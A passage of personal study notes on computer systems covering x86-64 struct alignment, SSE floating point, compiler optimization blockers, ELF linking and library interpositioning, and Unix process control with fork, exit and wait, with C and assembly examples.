    int i = r->i;
    r->a[i] = val;
    r = r->next;
  }
}

.L11:                        # loop:
  movslq 16(%rdi), %rax      # i = M[r + 16]
  movl %esi, (%rdi, %rax, 4) # M[r + 4*i] = val
  movq 24(%rdi), %rdi        # r = M[r + 24]
  testq %rdi, %rdi           # Test r
  jne .L11                   # if != 0 goto loop

Alignment

struct S1 {
  char c;
  int i[2];
  double v;
} *p;

Unaligned Data

Aligned Data
- Primitive data type requires K bytes
- Address must be multiple of K
- Required on some machines; advised on x86-64

Motivation for Aligning Data
- Memory accessed by (aligned) chunks of 4 or 8 bytes (system dependent)
  - Inefficient to load or store datum that spans quad word boundaries
  - Virtual memory trickier when datum spans 2 pages
Compiler
- Inserts gaps in structure to ensure correct alignment of fields

Specific Cases of Alignment (x86-64)

1 byte: char, ...
- no restrictions on address
2 bytes: short, ...
- lowest 1 bit of address must be $0_{2}$
4 bytes: int, float, ...
- lowest 2 bits of address must be $00_{2}$
8 bytes: double, long, char *, ...
- lowest 3 bits of address must be $000_{2}$

:::important If an address requires alignment to $2^{n}$ bytes, then its lowest $n$ bits must be $0$. :::

Satisfying Alignment with Structures

Within structure
- Must satisfy each element's alignment requirement
Overall structure placement
- Each structure has alignment requirement K
  - K is largest alignment of any element
- Initial address & structure length must be multiples of K
Example

struct S2 {
  double v;
  int i[2];
  char c;
} *p;

Arrays of Structures

Overall structure length multiple of K
Satisfy alignment requirement for every element

struct S2 {
  double v;
  int i[2];
  char c;
} a[10];

Accessing Array Elements

Compute array offset 12*idx
- sizeof(S3), including alignment spacers
Element j is at offset 8 within structure
Assembler gives offset a+8
- Resolved during linking

struct S3 {
  short i;
  float v;
  short j;
} a[10];

short get_j(int idx) {
  return a[idx].j;
}

leaq   (%rdi, %rdi, 2), %rax # 3*idx
movzwl a+8(, %rax, 4), %eax

Saving Space

Put large data types first

struct S4 {
  char c;
  int i;
  char d;
} *p;

struct S5 {
  int i;
  char c;
  char d;
} *p;

Floating Point

x87 FP

Legacy, very ugly

SSE3 FP

XMM Registers

Scalar & SIMD Operations

SIMD (Single instruction, multiple data), there are a ton of usage combinations, e.g.:

addss (ADD Scalar Single-Precision Floating-Point Values)
addps (ADD Packed Single-Precision Floating-Point Values)

Basics

Arguments passed in %xmm0, %xmm1, ...
Result returned in %xmm0
All XMM registers caller-saved

float fadd(float x, float y) {
  return x + y;
}

addss %xmm1, %xmm0
ret

double dadd(double x, double y) {
  return x + y;
}

addsd %xmm1, %xmm0
ret

Memory Referencing

Integer (and pointer) arguments passed in regular registers
Floating Point values passed in XMM registers
Different mov instructions to move between XMM registers, and between memory and XMM registers

double dincr(double *p, double v) {
  double x = *p;
  *p = x + v;
  return x;
}

movapd %xmm0, %xmm1 # Copy v
movsd (%rdi), %xmm0 # x = *p
addsd %xmm0, %xmm1  # t = x + v
movsd %xmm1, (%rdi) # *p = t
ret

movapd (Move Aligned Packed Double-Precision Floating-Point Values)

Other Aspects of Floating Point Instructions

Lots of instructions
- Different operations, different formats, ...
Floating-point comparisons
- Instructions ucomiss (Unordered Compare Scalar Single-Precision) and ucomisd (Unordered Compare Scalar Double-Precision)
- Set condition codes CF, ZF, and PF
Using constant values
- Set XMM0 register to 0 with instruction xorpd %xmm0, %xmm0
- Others loaded from memory

AVX FP

Newest version
Similar to SSE

Floating Point assembly instruction sets are very nasty, though it's principle thought is simple. So I am just skipping this chapter as TODO. Bro really don't want learn this chapter...

Memory Layout

x86-64 Linux Memory Layout

Stack
- Runtime stack (8MB limit, check by limit command)
- E.g., local variables
Heap
- Dynamically allocated as needed
- When call malloc(), calloc(), new()
Data
- Statically allocated data
- E.g., global vars, static vars, string constants
Text / Shared Libraries
- Executable machine instructions
- Read-only

:::tip In common, the canonical address range in x86-64 is 47 bits address. That is why the maximum address show as 0x00007FFFFFFFFFFF. :::

Unions

Allocation

Allocate according to largest element
Can only use one field at a time

union U1 {
  char c;
  int i[2];
  double v;
} *up;

struct S1 {
  char c;
  int i[2];
  double v;
} *sp;

Program Optimization

There's more to performance than asymptotic complexity
Must optimize at multiple levels: algorithm, data representations, procedures, and loops

Optimizing Compilers

Provide efficient mapping of program to machine
- register allocation
- code selection and ordering (scheduling)
- dead code elimination
- eliminating minor inefficiencies
Don't (usually) improve asymptotic efficiency
- up to programmer to select best overall algorithm
- Big-O savings are (often) more important than constant factors
  - but constant factors also matter
Have difficulty overcoming "optimization blockers"
- potential memory aliasing
- potential procedure side-effects

Limitations of Optimizing Compilers

Operate under fundamental constraint
- Must not cause any change in program behavior
  - Except, possibly when program making use of nonstandard language features
- Often prevents it from making optimizations that would only affect behavior under pathological conditions.
Behavior that may be obvious to the programmer can be obfuscated by languages and coding styles
- E.g., Data ranges may be more limited than variable types suggest
Most analysis is performed only within procedures
- Whole-program analysis is too expensive in most cases
- Newer versions of GCC do interprocedural analysis within individual files
  - But, not between code in different files
Most analysis is based only on static information
- Compiler has difficulty anticipating run-time inputs
When in doubt, the compiler must be conservative

Generally Useful Optimizations

Optimizations that you or the compiler should do regardless of processor / compiler

Code Motion
- Reduce frequency with which computation performed
  - If it will always produce same result
  - Especially moving code out of loop

void set_row(double *a, double *b, long i, long n) {
  long j;
  for (j = 0; j < n; j++)
    a[n*i+j] = b[j];
}

void set_row(double *a, double *b, long i, long n) {
  long j;
  int ni = n*i;
  for (j = 0; j < n; j++)
    a[ni+j] = b[j];
}

Compiler-Generated Code Motion (-O1)

void set_row(double *a, double *b, long i, long n) {
  long j;
  for (j = 0; j < n; j++)
    a[n*i+j] = b[j];
}

set_row:
  testq %rcx, %rcx             # Test n
  jle .L1                      # If 0, goto done
  imulq %rcx, %rdx             # ni = n*i
  leaq (%rdi , %rdx, 8), %rdx  # rowp = A + ni*8
  movl $0, %eax                # j = 0
.L3:                           # loop:
  movsd (%rsi, %rax, 8), %xmm0 # t = b[j]
  movsd %xmm0, (%rdx, %rax, 8) # M[A + ni*8 + j*8] = t
  addq $1, %rax                # j++
  cmpq %rcx, %rax              # j:n
  jne .L3                      # if !=, goto loop
.L1:                           # done:
  rep ; ret

To the C code:

void set_row(double *a, double *b, long i, long n) {
  long j;
  long ni = n*i;
  double *rowp = a+ni;
  for (j = 0; j < n; j++)
    *rowp++ = b[j];
}

Reduction in Strength

Replace costly operation with simpler one
Shift, add instead of multiply or divide
- Utility machine dependent
- Depends on cost of multiply or divide instruction
- Recognize sequence of products

for (i = 0; i < n; i++) {
  int ni = n*i;
  for (j = 0; j < n; j++)
    a[ni + j] = b[j];
}

int ni = 0;
for (i = 0; i < n; i++) {
  for (j = 0; j < n; j++)
    a[ni + j] = b[j];
  ni += n;
}

Share Common Subexpressions

Reuse portions of expressions
GCC will do this with –O1

up = val[(i-1)*n + j ];
down = val[(i+1)*n + j ];
left = val[i*n + j-1];
right = val[i*n + j+1];
sum = up + down + left + right;

leaq 1(%rsi), %rax # i+1
leaq -1(%rsi), %r8 # i-1
imulq %rcx, %rsi   # i*n
imulq %rcx, %rax   # (i+1)*n
imulq %rcx, %r8    # (i-1)*n
addq %rdx, %rsi    # i*n+j
addq %rdx, %rax    # (i+1)*n+j
addq %rdx, %r8     # (i-1)*n+j

3 multiplications: i*n, (i–1)*n, (i+1)*n

long inj = i*n + j;
up = val[inj - n];
down = val[inj + n];
left = val[inj - 1];
right = val[inj + 1];
sum = up + down + left + right;

imulq %rcx, %rsi        # i*n
addq %rdx, %rsi         # i*n+j
movq %rsi, %rax         # i*n+j
subq %rcx, %rax         # i*n+j-n
leaq (%rsi, %rcx), %rcx # i*n+j+n

1 multiplication: i*n

Optimization Blockers

:::note I'm just skipping this chapter, so the notes are seems disordered. Will retake this chapter later. :::

Optimization Blocker: Procedure Calls

void lower(char *s) {
  size_t i;
  for (i = 0; i < strlen(s); i++)
    if (s[i] >= 'A' && s[i] <= 'Z')
      s[i] -= ('A' - 'a');
}

strlen executed every iteration
Time quadruples when double string length
Quadratic performance

Calling strlen

/* My version of strlen */
size_t strlen(const char *s) {
  size_t length = 0;
  while (*s != '\0') {
    s++;
    length++;
  }
  return length;
}

strlen performance
- Only way to determine length of string is to scan its entire length, looking for null character
Overall performance, string of length N
- N calls to strlen
- Require times N, N-1, N‐2, ..., 1
- Overall $O(N^{2})$ performance

Improving Performance

void lower(char *s) {
  size_t i;
  size_t len = strlen(s);
  for (i = 0; i < len; i++)
    if (s[i] >= 'A' && s[i] <= 'Z')
      s[i] -= ('A' - 'a');
}

Move call to strlen outside of loop
Since result does not change from one iteration to another
Form of code motion

Improved Lower Case Conversion Performance

Why couldn't compiler move strlen out of inner loop ?

Procedure may have side effects
- Alters global state each time called
Function may not return same value for given arguments
- Depends on other parts of global state
- Procedure lower could interact with strlen
Warning
- Compiler treats procedure call as a black box
- Weak optimizations near them
Remedies
- Use of inline functions
  - GCC does this with –O1 within single file
- Do your own code motion

Memory Matters

/* Sum rows is of n X n matrix a
   and store in vector b */
void sum_rows1(double *a, double *b, long n) {
  long i, j;
  for (i = 0; i < n; i++) {
    b[i] = 0;
    for (j = 0; j < n; j++)
      b[i] += a[i*n + j];
  }
}

# sum_rows1 inner loop
.L4:
  movsd (%rsi, %rax, 8), %xmm0 # FP load
  addsd (%rdi), %xmm0          # FP add
  movsd %xmm0, (%rsi, %rax, 8) # FP store
  addq $8, %rdi
  cmpq %rcx, %rdi
  jne .L4

Memory Aliasing

Code updates b[i] on every iteration
Must consider possibility that these updates will affect program behavior

Removing Aliasing

/* Sum rows is of n X n matrix a
   and store in vector b */
void sum_rows2(double *a, double *b, long n) {
  long i, j;
  for (i = 0; i < n; i++) {
    double val = 0;
    for (j = 0; j < n; j++)
      val += a[i*n + j];
    b[i] = val;
  }
}

# sum_rows2 inner loop
.L10:
  addsd (%rdi), %xmm0 # FP load + add
  addq $8, %rdi
  cmpq %rax, %rdi
  jne .L10

No need to store intermediate results

Optimization Blocker: Memory Aliasing

Aliasing
- Two different memory references specify single location
- Easy to have happen in C
  - Since allowed to do address arithmetic
  - Direct access to storage structures
- Get in habit of introducing local variables
  - Accumulating within loops
  - Your way of telling compiler not to check for aliasing

Exploiting Instruction‐Level Parallelism

TODO

Dealing with Conditionals

TODO

The Memory Hierarchy

TODO

Cache Memories

TODO

Linking

Static Linking

Programs are translated and linked using a compiler driver: gcc -Og -o prog main.c sum.c

Why Linkers ?

Reason 1: Modularity
- Program can be written as a collection of smaller source files, rather than one monolithic mass
- Can build libraries of common functions
  - E.g., Math library, Standard C library
Reason 2: Efficiency
- Time: Separate compilation
  - Change one source file, compile, and then relink
  - No need to recompile other source files
- Space: Libraries
  - Common functions can be aggregated into a single file
  - Yet executable files and running memory images contain only code for the functions they actually use

What Do Linkers Do ?

Step 1: Symbol resolution
- Programs define and reference symbols (global variables and functions)
  - void swap() { ... } /* define symbol swap */
  - swap(); /* reference symbol swap */
  - int *xp = &x; /* define symbol xp, reference x */
- Symbol definitions are stored in object file (by assembler) in symbol table
  - Symbol table is an array of structs
  - Each entry includes name, size, and location of symbol
- During symbol resolution step, the linker associates each symbol reference with exactly one symbol definition
Step 2: Relocation
- Merges separate code and data sections into single sections
- Relocates symbols from their relative locations in the .o files to their final absolute memory locations in the executable
- Updates all references to these symbols to reflect their new positions

Three Kinds of Object Files (Modules)

Relocatable object file (.o file)
- Contains code and data in a form that can be combined with other relocatable object files to form executable object file
  - Each .o file is produced from exactly one source (.c) file
Executable object file (a.out file)
- Contains code and data in a form that can be copied directly into memory and then executed
Shared object file (.so file)
- Special type of relocatable object file that can be loaded into memory and linked dynamically, at either load time or run-time
- Called Dynamic Link Libraries (DLLs) by Windows

Executable and Linkable Format (ELF)

Standard binary format for object files
One unified format for
- Relocatable object files (.o)
- Executable object files (a.out)
- Shared object files (.so)
Generic name: ELF binaries

ELF Object File Format

ELF header
- Word size, byte ordering, file type (.o, exec, .so), machine type, etc
Segment header table (required for executables)
- Page size, virtual addresses memory segments (sections), segment sizes
.text section
- Code
.rodata section
- Read only data: jump tables, ...
.data section
- Initialized global variables
.bss section
- Global variables that are uninitialized or initialized to zero
- Block Started by Symbol
- "Better Save Space"
- Has section header but occupies no space
.symtab section
- Symbol table
- Procedure and static variable names
- Section names and locations
.rel.text section
- Relocation info for .text section
- Addresses of instructions that will need to be modified in the executable
- Instructions for modifying
.debug section
- Info for symbolic debugging (gcc -g)
Section header table
- Offsets and sizes of each section

Linker Symbols

Global symbols
- Symbols defined by module m that can be referenced by other modules
- E.g.: non-static C functions and non-static global variables
External symbols
- Global symbols that are referenced by module m but defined by some other module
Local symbols
- Symbols that are defined and referenced exclusively by module m
- E.g.: C functions and global variables defined with the static attribute
- Local linker symbols are not local program variables

Local non-static C variables vs. local static C variables

Local non-static C variables stored on the stack
Local static C variables stored in either .bss, or .data

int f() {
  static int x = 0; /* .bss */
  return x;
}

int g() {
  static int x = 1; /* .data */
  return x;
}

In the case above, compiler allocates space in .data for each definition of x and creates local symbols in the symbol table with unique names, e.g., x.1 and x.2.

:::important Local static variables are only initialized at first time encountered, calls after won't reinitialize. :::

How Linker Resolves Duplicate Symbol Definitions

Program symbols are either strong or weak
- Strong: procedures and initialized globals
- Weak: uninitialized globals

Linker's Symbol Rules

Rule 1: Multiple strong symbols are not allowed
- Each item can be defined only once
- Otherwise: Linker error
Rule 2: Given a strong symbol and multiple weak symbols, choose the strong symbol
- References to the weak symbol resolve to the strong symbol
Rule 3: If there are multiple weak symbols, pick an arbitrary one
- Can override this with gcc –fno-common

Global Variables

Avoid if you can
Otherwise
- Use static if you can
- Initialize if you define a global variable
- Use extern if you reference an external global variable

Relocation

Relocation Entries

int array[2] = {1, 2};

int main() {
  int val = sum(array, 2);
  return val;
}

0000000000000020 <main>:
  20: be 02 00 00 00        mov    $0x2,%esi
  25: 48 8d 3d 00 00 00 00  lea    0x0(%rip),%rdi        # 2c <main+0xc>
   28: R_X86_64_PC32 array-0x4
  2c: e8 00 00 00 00        call   31 <main+0x11>
   2d: R_X86_64_PLT32 sum-0x4
  31: c3                    ret

Relocated .text section

0000000000001120 <sum>:
    1120: ba 00 00 00 00        mov    $0x0,%edx
    1125: b8 00 00 00 00        mov    $0x0,%eax
    112a: eb 0d                 jmp    1139 <sum+0x19>
    112c: 0f 1f 40 00           nopl   0x0(%rax)
    1130: 48 63 c8              movslq %eax,%rcx
    1133: 03 14 8f              add    (%rdi,%rcx,4),%edx
    1136: 83 c0 01              add    $0x1,%eax
    1139: 39 f0                 cmp    %esi,%eax
    113b: 7c f3                 jl     1130 <sum+0x10>
    113d: 89 d0                 mov    %edx,%eax
    113f: c3                    ret

0000000000001140 <main>:
    1140: be 02 00 00 00        mov    $0x2,%esi
    1145: 48 8d 3d c4 2e 00 00  lea    0x2ec4(%rip),%rdi        # 4010 <array>
    114c: e8 cf ff ff ff        call   1120 <sum>
    1151: c3                    ret

Using PC-relative addressing for sum: 0x1120 = 0x1151 + 0xffffffcf

Loading Executable Object Files

Packaging Commonly Used Functions

How to package functions commonly used by programmers ?
- Math, I/O, memory management, string manipulation, etc
Awkward, given the linker framework so far:
- Option 1: Put all functions into a single source file
  - Programmers link big object file into their programs
  - Space and time inefficient
- Option 2: Put each function in a separate source file
  - Programmers explicitly link appropriate binaries into their programs
  - More efficient, but burdensome on the programmer

Old-fashioned Solution: Static Libraries

Static libraries (.a archive files)
- Concatenate related relocatable object files into a single file with an index (called an archive)
- Enhance linker so that it tries to resolve unresolved external references by looking for the symbols in one or more archives
- If an archive member file resolves reference, link it into the executable

Creating Static Libraries

Archiver allows incremental updates
Recompile function that changes and replace .o file in archive

Linking with Static Libraries

Using Static Libraries

Linker's algorithm for resolving external references
- Scan .o files and .a files in the command line order
- During the scan, keep a list of the current unresolved references
- As each new .o or .a file, obj, is encountered, try to resolve each unresolved reference in the list against the symbols defined in obj
- If any entries in the unresolved list at end of scan, then error
Problem
- Command line order matters!
- Moral: put libraries at the end of the command line

unix> gcc -L. libtest.o -lmine
unix> gcc -L. -lmine libtest.o
libtest.o: In function `main':
libtest.o(.text+0x4): undefined reference to `libfun'

Shared Libraries

Static libraries have the following disadvantages
- Duplication in the stored executables (every function needs libc)
- Duplication in the running executables
- Minor bug fixes of system libraries require each application to explicitly relink
Modern solution: Shared Libraries
- Object files that contain code and data that are loaded and linked into an application dynamically, at either load-time or run-time
- Also called: dynamic link libraries, DLLs, .so files
Dynamic linking can occur when executable is first loaded and run (load-time linking)
- Common case for Linux, handled automatically by the dynamic linker (ld-linux.so) Standard C library (libc.so) usually dynamically linked
Dynamic linking can also occur after program has begun (run-time linking)
- In Linux, this is done by calls to the dlopen() interface
  - Distributing software
  - High-performance web servers
  - Runtime library interpositioning
Shared library routines can be shared by multiple processes

Dynamic Linking at Load-time

Dynamic Linking at Run-time

#include <stdio.h>
#include <stdlib.h>
#include <dlfcn.h>

int x[2] = {1, 2};
int y[2] = {3, 4};
int z[2];

int main() {
  void *handle;
  void (*addvec)(int *, int *, int *, int);
  char *error;

  /* Dynamically load the shared library that contains addvec() */
  handle = dlopen("./libvector.so", RTLD_LAZY);
  if (!handle) {
    fprintf(stderr, "%s\n", dlerror());
    exit(1);
  }

  /* Get a pointer to the addvec() function we just loaded */
  addvec = dlsym(handle, "addvec");
  if ((error = dlerror()) != NULL) {
    fprintf(stderr, "%s\n", error);
    exit(1);
  }

  /* Now we can call addvec() just like any other function */
  addvec(x, y, z, 2);
  printf("z = [%d %d]\n", z[0], z[1]);

  /* Unload the shared library */
  if (dlclose(handle) < 0) {
    fprintf(stderr, "%s\n", dlerror());
    exit(1);
  }
  return 0;
}

Library Interpositioning

Its a powerful linking technique that allows programmers to intercept calls to arbitrary functions
Interpositioning can occur at:
- Compile time: When the source code is compiled
- Link time: When the relocatable object files are statically linked to form an executable object file
- Load/Run time: When an executable object file is loaded into memory, dynamically linked, and then executed

Example Program

#include <stdio.h>
#include <malloc.h>

int main() {
  int *p = malloc(32);
  free(p);
  return(0);
}

Goal: trace the addresses and sizes of the allocated and freed blocks, without breaking the program, and without modifying the source code
Three solutions: interpose on the lib malloc and free functions at compile time, link time, and load/run time

Compile-time Interpositioning

#ifdef COMPILETIME
#include <stdio.h>
#include <malloc.h>

/* malloc wrapper function */
void *mymalloc(size_t size) {
  void *ptr = malloc(size);
  printf("malloc(%d)=%p\n", (int)size, ptr);
  return ptr;
}

/* free wrapper function */
void myfree(void *ptr) {
  free(ptr);
  printf("free(%p)\n", ptr);
}
#endif

#define malloc(size) mymalloc(size)
#define free(ptr) myfree(ptr)

void *mymalloc(size_t size);
void myfree(void *ptr);

linux> make intc
gcc -Wall -DCOMPILETIME -c mymalloc.c
gcc -Wall -I. -o intc int.c mymalloc.o
linux> make runc
./intc
malloc(32)=0x1edc010
free(0x1edc010)
linux>

Link-time Interpositioning

#ifdef LINKTIME
#include <stdio.h>

void *__real_malloc(size_t size);
void __real_free(void *ptr);

/* malloc wrapper function */
void *__wrap_malloc(size_t size) {
  void *ptr = __real_malloc(size); /* Call libc malloc */
  printf("malloc(%d) = %p\n", (int)size, ptr);
  return ptr;
}

/* free wrapper function */
void __wrap_free(void *ptr) {
  __real_free(ptr); /* Call libc free */
  printf("free(%p)\n", ptr);
}
#endif

linux> make intl
gcc -Wall -DLINKTIME -c mymalloc.c
gcc -Wall -c int.c
gcc -Wall -Wl,--wrap,malloc -Wl,--wrap,free -o intl int.o mymalloc.o
linux> make runl
./intl
malloc(32) = 0x1aa0010
free(0x1aa0010)
linux>

The -Wl flag passes argument to linker, replacing each comma with a space
The --wrap,malloc arg instructs linker to resolve references in a special way:
- Refs to malloc should be resolved as __wrap_malloc
- Refs to __real_malloc should be resolved as malloc

Load/Run time Interpositioning

#ifdef RUNTIME
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <dlfcn.h>

/* malloc wrapper function */
void *malloc(size_t size) {
  void *(*mallocp)(size_t size);
  char *error;

  mallocp = dlsym(RTLD_NEXT, "malloc"); /* Get addr of libc malloc */
  if ((error = dlerror()) != NULL) {
    fputs(error, stderr);
    exit(1);
  }
  char *ptr = mallocp(size); /* Call libc malloc */
  printf("malloc(%d) = %p\n", (int)size, ptr);
  return ptr;
}

/* free wrapper function */
void free(void *ptr) {
  void (*freep)(void *) = NULL;
  char *error;

  if (!ptr)
    return;

  freep = dlsym(RTLD_NEXT, "free"); /* Get address of libc free */
  if ((error = dlerror()) != NULL) {
    fputs(error, stderr);
    exit(1);
  }
  freep(ptr); /* Call libc free */
  printf("free(%p)\n", ptr);
}
#endif

linux> make intr
gcc -Wall -DRUNTIME -shared -fpic -o mymalloc.so mymalloc.c -ldl
gcc -Wall -o intr int.c
linux> make runr
(LD_PRELOAD="./mymalloc.so" ./intr)
malloc(32) = 0xe60010
free(0xe60010)
linux>

The LD_PRELOAD environment variable tells the dynamic linker to resolve unresolved refs (e.g., to malloc) by looking in mymalloc.so first

Exceptional Control Flow

Control Flow

Processors do only one thing:
- From startup to shutdown, a CPU simply reads and executes (interprets) a sequence of instructions, one at a time
- This sequence is the CPU's control flow (or flow of control)

Up to now, we have learned two mechanisms for changing control flow:

Jumps and branches
Call and return

They react to changes in program state.

But its insufficient for a useful system: difficult to react to changes in system state:

Data arrives from a disk or a network adapter
Instruction divides by zero
User hits Ctrl-C at the keyboard
System timer expires

That's why we need mechanisms for "exceptional control flow".

Exceptional Control Flow

Exists at all levels of a computer system
Low level mechanisms
- Exceptions
  - Change in control flow in response to a system event (i.e., change in system state)
  - Implemented using combination of hardware and OS software
Higher level mechanisms
- Process context switch
  - Implemented by OS software and hardware timer
- Signals
  - Implemented by OS software
- Nonlocal jumps: setjmp() and longjmp()
  - Implemented by C runtime library

Exceptions

An exception is a transfer of control to the OS kernel in response to some event (i.e., change in processor state)
- Kernel is the memory-resident part of the OS
- Examples of events: Divide by 0, arithmetic overflow, page fault, I/O request completes, typing Ctrl‐C

Exception Tables

Synchronous Exceptions

Caused by events that occur as a result of executing an instruction
- Traps
  - Intentional (e.g., system calls, breakpoint traps, special instructions)
  - Returns control to "next" instruction
- Faults
  - Unintentional but possibly recoverable (e.g., page faults (recoverable), protection faults (unrecoverable), floating point exceptions)
  - Either re-executes faulting ("current") instruction or aborts
- Aborts
  - Unintentional and unrecoverable (e.g., illegal instruction, parity error, machine check)
  - Aborts current program

Asynchronous Exceptions (Interrupts)

Caused by events external to the processor
- Indicated by setting the processor’s interrupt pin
- Handler returns to "next" instruction
Examples:
- Timer interrupt
  - Every few ms, an external timer chip triggers an interrupt
  - Used by the kernel to take back control from user programs
- I/O interrupt from external device
  - Hitting Ctrl-C at the keyboard
  - Arrival of a packet from a network
  - Arrival of data from a disk

Processes

Definition: A process is an instance of a running program
- One of the most profound ideas in computer science
- Not the same as "program" or "processor"
Process provides each program with two key abstractions:
- Logical control flow
  - Each program seems to have exclusive use of the CPU
  - Provided by kernel mechanism called context switching
- Private address space
  - Each program seems to have exclusive use of main memory
  - Provided by kernel mechanism called virtual memory

Multiprocessing: The Illusion

Computer runs many processes simultaneously
- Applications for one or more users
  - Web browsers, email clients, editors, ...
- Background tasks
  - Monitoring network & I/O devices

Multiprocessing: The (Traditional) Reality

Single processor executes multiple processes concurrently
- Process executions interleaved (multitasking)
- Address spaces managed by virtual memory system
- Register values for non-executing processes saved in memory
Save current registers in memory

Schedule next process for execution
Load saved registers and switch address space (context switch)

Multiprocessing: The (Modern) Reality

Multicore processors
- Multiple CPUs on single chip
- Share main memory (and some of the caches)
- Each can execute a separate process
  - Scheduling of processors onto cores done by kernel

Concurrent Processes

Each process is a logical control flow
Two processes run concurrently (are concurrent) if their flows overlap in time
Otherwise, they are sequential
Examples (running on single core):
- Concurrent: A & B, A & C
- Sequential: B & C

User View of Concurrent Processes

Control flows for concurrent processes are physically disjoint in time
However, we can think of concurrent processes as running in parallel with each other

Context Switching

Processes are managed by a shared chunk of memory-resident OS code called the kernel
- Important: the kernel is not a separate process, but rather runs as part of some existing process
Control flow passes from one process to another via a context switch

Process Control

System Call Error Handling

On error, Linux system-level functions typically return ‐1 and set global variable errno to indicate cause
Hard and fast rule:
- You must check the return status of every system-level function
- Only exception is the handful of functions that return void

if ((pid = fork()) < 0) {
  fprintf(stderr, "fork error: %s\n", strerror(errno));
  exit(0);
}

Error-reporting functions

Can simplify somewhat using an error-reporting function:

/* Unix-style error */
void unix_error(char *msg) {
  fprintf(stderr, "%s: %s\n", msg, strerror(errno));
  exit(0);
}

if ((pid = fork()) < 0)
  unix_error("fork error");

Error-handling Wrappers

Simplify the present code even further by using Stevens-style error-handling wrappers:

pid_t Fork(void) {
  pid_t pid;

  if ((pid = fork()) < 0)
    unix_error("Fork error");
  return pid;
}

pid = Fork();

Processes States

From a programmer's perspective, we can think of a process as being in one of three states:

Running
- Process is either executing, or waiting to be executed and will eventually be scheduled (i.e., chosen to execute) by the kernel
Stopped
- Process execution is suspended and will not be scheduled until further notice
Terminated
- Process is stopped permanently

Creating Processes

Parent process creates a new running child process by calling fork
int fork(void)
- Returns 0 to the child process, child's PID to parent process
- Child is almost identical to parent:
  - Child get an identical (but separate) copy of the parent's virtual address space
  - Child gets identical copies of the parent's open file descriptors
  - Child has a different PID than the parent
fork is interesting (and often confusing) because it is called once but returns twice

fork Example

int main() {
  pid_t pid;
  int x = 1;

  pid = Fork();
  if (pid == 0) { /* Child */
    printf("child: x=%d\n", ++x);
    exit(0);
  }

  /* Parent */
  printf("parent: x=%d\n", --x);
  exit(0);
}

linux> ./fork
parent: x=0
child: x=2

Call once, return twice
Concurrent execution
- Can’t predict execution order of parent and child
Duplicate but separate address space
- x has a value of 1 when fork returns in parent and child
- Subsequent changes to x are independent
Shared open files
- stdout is the same in both parent and child

Terminating Processes

Process becomes terminated for one of three reasons:
- Receiving a signal whose default action is to terminate
- Returning from the main routine
- Calling the exit function
void exit(int status)
- Terminates with an exit status of status
- Convention: normal return status is 0, nonzero on error
- Another way to explicitly set the exit status is to return an integer value from the main routine
exit is called once but never returns

Modeling fork with Process Graphs

A process graph is a useful tool for capturing the partial ordering of statements in a concurrent program:
- Each vertex is the execution of a statement
- a ‐> b means a happens before b
- Edges can be labeled with current value of variables
- printf vertices can be labeled with output
- Each graph begins with a vertex with no inedges
Any topological sort of the graph corresponds to a feasible total ordering
- Total ordering of vertices where all edges point from left to right

Process Graph Example

int main() {
  pid_t pid;
  int x = 1;

  pid = Fork();
  if (pid == 0) { /* Child */
    printf("child: x=%d\n", ++x);
    exit(0);
  }

  /* Parent */
  printf("parent: x=%d\n", --x);
  exit(0);
}

Interpreting Process Graphs

Original graph:

Relabled graph:

Feasible total ordering:

Infeasible total ordering:

fork Example: Two consecutive forks

void fork2() {
  printf("L0\n");
  fork();
  printf("L1\n");
  fork();
  printf("Bye\n");
}

fork Example: Nested forks in parent

void fork4() {
  printf("L0\n");
  if (fork() != 0) {
    printf("L1\n");
    if (fork() != 0) {
      printf("L2\n");
    }
  }
  printf("Bye\n");
}

fork Example: Nested forks in children

void fork5() {
  printf("L0\n");
  if (fork() == 0) {
    printf("L1\n");
    if (fork() == 0) {
      printf("L2\n");
    }
  }
  printf("Bye\n");
}

Reaping Child Processes

Idea
- When process terminates, it still consumes system resources (e.g., Exit status, various OS tables)
- Called a zombie (Living corpse, half alive and half dead)
Reaping
- Performed by parent on terminated child (using wait or waitpid)
- Parent is given exit status information
- Kernel then deletes zombie child process
What if parent doesn't reap ?
- If any parent terminates without reaping a child, then the orphaned child will be reaped by init process (pid == 1)
- So, only need explicit reaping in long-running processes (e.g., shells and servers)

Zombie Example

void fork7() {
  if (fork() == 0) {
    /* Child */
    printf("Terminating Child, PID = %d\n", getpid());
    exit(0);
  } else {
    printf("Running Parent, PID = %d\n", getpid());
    while (1)
      ; /* Infinite loop */
  }
}

linux> ./forks 7 &
[1] 6639
Running Parent, PID = 6639
Terminating Child, PID = 6640
linux> ps
PID TTY TIME CMD
6585 ttyp9 00:00:00 tcsh
6639 ttyp9 00:00:03 forks
6640 ttyp9 00:00:00 forks <defunct>
6641 ttyp9 00:00:00 ps
linux> kill 6639
[1] Terminated
linux> ps
PID TTY TIME CMD
6585 ttyp9 00:00:00 tcsh
6642 ttyp9 00:00:00 ps

ps shows child process as "defunct" (i.e., a zombie)
Killing parent allows child to be reaped by init

Non-terminating Child Example

void fork8() {
  if (fork() == 0) {
    /* Child */
    printf("Running Child, PID = %d\n", getpid());
    while (1)
      ; /* Infinite loop */
  } else {
    printf("Terminating Parent, PID = %d\n", getpid());
    exit(0);
  }
}

linux> ./forks 8
Terminating Parent, PID = 6675
Running Child, PID = 6676
linux> ps
PID TTY TIME CMD
6585 ttyp9 00:00:00 tcsh
6676 ttyp9 00:00:06 forks
6677 ttyp9 00:00:00 ps
linux> kill 6676
linux> ps
PID TTY TIME CMD
6585 ttyp9 00:00:00 tcsh
6678 ttyp9 00:00:00 ps

Child process still active even though parent has terminated
Must kill child explicitly, or else will keep running indefinitely

wait: Synchronizing with Children

Parent reaps a child by calling the wait function
int wait(int *child_status)
- Suspends current process until one of its children terminates
- Return value is the pid of the child process that terminated
- If child_status != NULL, then the integer it points to will be set to a value that indicates reason the child terminated and the exit status:
  - Checked using macros defined in wait.h
    - WIFEXITED, WEXITSTATUS, WIFSIGNALED, WTERMSIG, WIFSTOPPED, WSTOPSIG, WIFCONTINUED

wait Example

void fork9() {
  int child_status;

  if (fork() == 0) {
    printf("HC: hello from child\n");
    exit(0);
  } else {
    printf("HP: hello from parent\n");
    wait(&child_status);
    printf("CT: child has terminated\n");
  }
  printf("Bye\n");
}

Another wait Example

If multiple children completed, will take in arbitrary order
Can use macros WIFEXITED and WEXITSTATUS to get information about exit status

void fork10() {
  pid_t pid[N];
  int i, child_status;

  for (i = 0; i < N; i++)
    if ((pid[i] = fork()) == 0)
      exit(100+i); /* Child */
